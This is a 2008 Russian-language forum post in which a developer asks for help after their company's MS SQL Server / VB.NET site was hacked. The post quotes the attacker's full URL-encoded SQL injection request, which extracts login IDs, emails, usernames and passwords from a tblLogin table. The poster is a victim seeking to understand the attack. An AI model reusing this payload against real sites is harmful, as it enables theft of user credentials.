|
|
|
 |
 |
Сообщение |
 |
|
 |
 |
Молчун
Зарегистрирован:
01 February 2006
Сообщения: 30
Примеры кода: 0
|
хакнули датабазу , помогите.. |
30 June 2008 16:26 |
|
|
|
|
У меня на работе хакнули сайт , шеф негодует , подскажите что это ? SQL injection понятно , но если кто сталкивался помогите , обьясните неопытному
Сайт на MS SQL Server, VB.NET
Что это %5B ? %5D? %20 пробел я так понял ..
tblLogin , LoginID , Password , это он подобрал , остальное неверно , к примеру Order ...
http://www.сайт.ru/detail.aspx?id=1465%20And%20char(124)%2b(Select%20Top%201%20isNull(cast(%5BLoginID%5D%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast(%5BEmail%5D%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast(%5BUsername%5D%20as%20varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast(%5BPassword%5D%20as%20varchar(8000)),char(32))%20From%20(Select%20Top%2017161%20%5BLoginID%5D,%5BEmail%5D,%5BUsername%5D,%5BPassword%5D%20From%20%5BНАЗВАНИЕДАТАБАЗЫ%5D..%5BtblLogin%5D%20Where%201=1%20Order%20by%20%5BLoginID%5D%20)%20T%20Order%20by%20%5BLoginID%5D%20desc)%3E0
Данное сообщение получено с сайта GotDotNet.RU
Последний раз редактировалось 30 June 2008 16:26
|
|
| Наверх |
|
|
|
|
 |
 |
 |
|
|